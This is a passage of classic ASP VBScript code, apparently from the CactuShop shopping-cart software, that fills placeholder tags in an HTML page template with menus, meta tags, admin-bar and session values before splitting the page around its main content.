	strPageBaseText = Replace(strPageBaseText, "xxxBASKETSUMMARYxxx", strBasketHTML)
	strPageBaseText = Replace(strPageBaseText, "xxxCATEGORYMENUxxx", strCategoryListHTML)
	strPageBaseText = Replace(strPageBaseText, "xxxLANGUAGEMENUxxx", strLanguageListHTML)
	strPageBaseText = Replace(strPageBaseText, "xxxCURRENCYMENUxxx", strCurrencyListHTML)
	strPageBaseText = Replace(strPageBaseText, "xxxPAGETITLExxx", WriteSafe(strPageTitleHTML & ""))
	strPageBaseText = Replace(strPageBaseText, "xxxMETADESCRIPTIONxxx", WriteSafe(strMetaDescHTML & ""))
	strPageBaseText = Replace(strPageBaseText, "xxxMETAKEYWORDSxxx", WriteSafe(strMetaKeywordsHTML & ""))
	strPageBaseText = Replace(strPageBaseText, "xxxADMINBARxxx", strAdminBarHTML)
	
		'Replace the session tags with their values
	strPageBaseText = Replace(strPageBaseText, "xxxSESSIONQSxxx", objCactuSession.QS)
	strPageBaseText = Replace(strPageBaseText, "xxxSESSIONFORMxxx", objCactuSession.Form)
	
	'Finally split the HTML into two pieces one for either side of the 
	'main page content and return
	aryPageTemplate = split(strPageBaseText,"xxxPAGECONTENTxxx",-1)
	ReadFromTemplate = aryPageTemplate
End Function

%>
